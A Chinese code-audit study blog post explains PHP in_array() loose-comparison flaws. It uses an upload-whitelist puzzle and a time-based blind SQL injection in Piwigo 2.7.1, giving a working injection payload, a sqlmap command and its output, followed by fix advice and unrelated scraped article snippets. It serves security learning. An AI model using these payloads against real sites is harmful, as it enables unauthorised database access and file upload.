代码审计学习01-in_array() 函数缺陷

一、开始代码审计之旅 01

从今天起,学习代码审计了,这篇文章就叫代码审计01吧,题目来自 PHP SECURITY CALENDAR 2017 的第一题,结合 红日安全 写的文章,开始吧。

二、先看这道题目

1、题目名称:Wish List

2、in_array() 函数的作用

in_array() 函数的作用是判断第一参数是否存在第二个参数中,存在返回 true,不存在返回 false。需要注意的是,如果函数第三个参数为 true,则第一个参数必须还要和第二个参数同类型,函数才能返回 true。不写第三个参数,在一些情况下函数会发生强制转换,题目的漏洞就出在这里。

3、题目漏洞解析

if (in_array($this->file[‘name‘], $this->whitelist)) {
    move_uploaded_file($this->file[‘tmp_name‘], self::UPLOAD_DIRECTORY . $this->file[‘name‘]);
}

in_array() 函数并只简单判断文件名是否存在白名单中,并没有将第三个参数设置为 true,攻击者可以上传一个 5backdoor.php 的文件,其文件名为 5backdoor,in_array() 函数将文件名强制转换为 5 ,符合 ranger(1,24) 的白名单条件,5backdoor.php 可以上传,于是一个任意文件上传漏洞就产生了。

4、in_array() 的扩展知识

in_array 的一段代码,可以明确看到非严格模式与严格模式下的区别:

<?php
$array = array(
    ‘egg‘ => true,
    ‘cheese‘ => false,
    ‘hair‘ => 765,
    ‘goblins‘ => null,
    ‘ogres‘ => ‘no ogres allowed in this array‘
);

// Loose checking -- return values are in comments
// First three make sense, last four do not
var_dump(in_array(null, $array)); // true
var_dump(in_array(false, $array)); // true
var_dump(in_array(765, $array)); // true
var_dump(in_array(763, $array)); // true
var_dump(in_array(‘egg‘, $array)); // true
var_dump(in_array(‘hhh‘, $array)); // true
var_dump(in_array(array(), $array)); // true

// Strict checking
var_dump(in_array(null, $array, true)); // true
var_dump(in_array(false, $array, true)); // true
var_dump(in_array(765, $array, true)); // true
var_dump(in_array(763, $array, true)); // false
var_dump(in_array(‘egg‘, $array, true)); // false
var_dump(in_array(‘hhh‘, $array, true)); // false
var_dump(in_array(array(), $array, true)); // false

?>

三、结合一个案例

选取 piwigo2.7.1 内容管理系统的一个 SQL 注入漏洞来分析

1、漏洞原理分析

漏洞涉及文件:include/functions_rate.inc.phpinclude/config_default.inc.php,以及根目录下的picture.php

picture.php 关键代码:

if (isset($_GET[‘action‘]))
{
  switch ($_GET[‘action‘])
/*****************中间省略*********************/
     case ‘rate‘ :
    {
      include_once(PHPWG_ROOT_PATH.‘include/functions_rate.inc.php‘);
      rate_picture($page[‘image_id‘], $_POST[‘rate‘]);
      redirect($url_self);
    }
/*****************中间省略*********************/
}

include/functions_rate.inc.php 关键代码

function rate_picture($image_id, $rate)
{
  global $conf, $user;

  if (!isset($rate)
      or !$conf[‘rate‘]
      or !in_array($rate, $conf[‘rate_items‘]))
  {
    return false;
  }
/*****************中间省略*********************/
  if ($user_anonymous)
  {
    $query.= ‘ AND anonymous_id = \‘‘.$anonymous_id.‘\‘‘;
  }
  pwg_query($query);
  $query = ‘
INSERT
  INTO ‘.RATE_TABLE.‘
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  (‘
    .$user[‘id‘].‘,‘
    .‘\‘‘.$anonymous_id.‘\‘,‘
    .$image_id.‘,‘
    .$rate
    .‘,NOW())
;‘;
  pwg_query($query);

  return update_rating_score($image_id);
}

include/config_default.inc.php 关键代码

$conf[‘rate_items‘] = array(0,1,2,3,4,5);

通过上述代码分析,当参数 action=rate时会调用 include/functions_rate.inc.phprate_picture($image_id, $rate) 函数,由于函数中的 in_array($rate, $conf[‘rate_items‘])) 没有将第三个参数设置因为 true,检查不严格,导致变量 $rate 变量可控,将 $rate 设置为 1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 那么 SQL 语句就会变成:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date)
VALUES (2,‘192.168.2‘,1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

基于时间的 SQL 盲注就产生了。

2、漏洞证明

用 SQL 注入工具 sqlmap 证明漏洞,payload 如下:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

漏洞验证返回结果:

[20:45:34] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to ‘http://192.168.203.131:80/piwigo/picture.php?/1/category/1‘. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rate (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: rate=1 AND SLEEP(5)
---
[20:45:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:45:37] [INFO] fetching database names
[20:45:37] [INFO] fetching number of databases
[20:45:37] [INFO] resumed: 5
[20:45:37] [INFO] resumed: information_schema
[20:45:37] [INFO] resumed: mysq
[20:45:37] [INFO] resumed: mysql
[20:45:37] [INFO] resumed: performance_schema
[20:45:37] [INFO] resumed: piwigo271
available databases [5]:
[*] information_schema
[*] mysq
[*] mysql
[*] performance_schema
[*] piwigo271

3、修复建议

方法1:将 in_array() 函数的第三个参数设置为 true;

方法2:使用 intval() 函数将变量将转为数字;

方法3:使用正则表达式过滤,只限制为数字(官方修改是用这种方法)。

四、学习一道同类型的 CTF 题目

五、个人收获

六、参考文章

原文地址:https://www.cnblogs.com/ldebug/p/9827282.html

时间: 2024-09-29 07:23:14

代码审计学习01-in_array() 函数缺陷的相关文章

PostgreSQL学习手册(五) 函数和操作符

PostgreSQL学习手册(五) 函数和操作符 一.逻辑操作符:    常用的逻辑操作符有:AND.OR和NOT.其语义与其它编程语言中的逻辑操作符完全相同. 二.比较操作符:    下面是PostgreSQL中提供的比较操作符列表: 操作符 描述 < 小于 > 大于 <= 小于或等于 >= 大于或等于 = 等于 != 不等于 比较操作符可以用于所有可以比较的数据类型.所有比较操作符都是双目操作符,且返回boolean类型.除了比较操作符以外,我们还可以使用BETWEEN语句,如

Node.Js学习01: Module System 以及一些常用Node Module

Node.Js学习就按照这本书的流程来. 在第7章结束与第10章结束时分别自己出一个小项目练练手.Node.Js的入门学习计划是这样. 目录:, QQ:1045642972 欢迎来索书以及讨论Node.Js. Node.Js Demo Node.Js官网提供了一个最基本的Demo Code: var http = require('http'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type':

javascript版in_array函数用法举例

javascript版in_array函数,用于判断数组中是否存在特定值. 判断一个字符串或者数字是否在数组内,很多程序语言都有这样一样专门的函数,比如PHP的in_array().那么JS有木有呢,很遗憾,JS木有这样的函数,于是想到伟大的JQ是否封装了这个函数,找到了API,JQ的确封装了这个函数jQuery.inArray( value, array ) 搜索数组中指定值并返回它的索引(如果没有找到则返回-1).value要搜索的值.array一个数组,通过它来搜索.当然,处于学习,自己也

【iScroll源码学习01】准备阶段 - 叶小钗

[iScroll源码学习01]准备阶段 - 叶小钗 时间 2013-12-29 18:41:00 博客园-原创精华区 原文  http://www.cnblogs.com/yexiaochai/p/3496369.html 主题 iScroll HTML JavaScript ① viewport相关知识点(device-width等) ②  CSS3硬件加速 ③ 如何暂停CSS动画 ④ e.preventDefault导致文本不能获取焦点解决方案 ...... 当然,我们写的demo自然不能和

python深入学习01 特殊方法

Python一切皆对象,但同时,Python还是一个多范式语言(multi-paradigm),你不仅可以使用面向对象的方式来编写程序,还可以用面向过程的方式来编写相同功能的程序(还有函数式.声明式等,我们暂不深入).Python的多范式依赖于Python对象中的特殊方法(special method). 特殊方法名的前后各有两个下划线.特殊方法又被成为魔法方法(magic method),定义了许多Python语法和表达方式.当对象中定义了特殊方法的时候,Python也会对它们有“特殊优待”.

pandas.DataFrame学习系列2——函数方法(1)

DataFrame类具有很多方法,下面做用法的介绍和举例. pandas.DataFrame学习系列2--函数方法(1) 1.abs(),返回DataFrame每个数值的绝对值,前提是所有元素均为数值型 1 import pandas as pd 2 import numpy as np 3 4 df=pd.read_excel('南京银行.xlsx',index_col='Date') 5 df1=df[:5] 6 df1.iat[0,1]=-df1.iat[0,1] 7 df1 8 Open

jQuery 源码学习 - 01 - 简洁的 $(&#39;...&#39;)

首先贴上学习参考资料:[深入浅出jQuery]源码浅析--整体架构,备用地址:chokcoco/jQuery-. jQuery 库,js 开发的一个里程碑,它的出现,让网页开发者们告别荒蛮的上古时代,初步解放生产力,正式进入黄铜时代. 虽然如今 Angular/React/Vue 三驾马车驰骋畋猎,jQuery的时代渐行渐远,但是它的思想它的设计都有着里程碑式的作用.当然,我是拿它来补基础的,逃... 1.自执行函数 (function(params) { // ... })(Variable)

bluecms v1.6 sp1 代码审计学习

前言 正式开始代码审计的学习,拓宽自己的知识面.代码审计学习的动力也是来自团队里的王叹之师傅,向王叹之师傅学习. 这里参考了一些前辈,师傅的复现经验和bluecms审计的心得 安装 install.php 搭建完成 seay自动审计 文件包含漏洞 /user.php 742-751行 elseif ($act == 'pay'){ include 'data/pay.cache.php'; $price = $_POST['price']; $id = $_POST['id']; $name =

MySQL学习笔记-自定义函数

MySQL学习笔记-自定义函数 1.自定义函数简介 自定义函数:用户自定义函数(user-defined function,UDF)是一种对MySQL扩展的途径,其用法与内置函数相同 自定义函数的两个必要条件:(1)参数  (2)返回值 自定义函数: 创建自定义函数 CREATE FUNCTION function_name RETURNS {STRING|INTEGER|REAL|DECIMAL} routine_body 关于函数体: 1.函数体可以由合法的SQL语句构成: 2.函数体可以是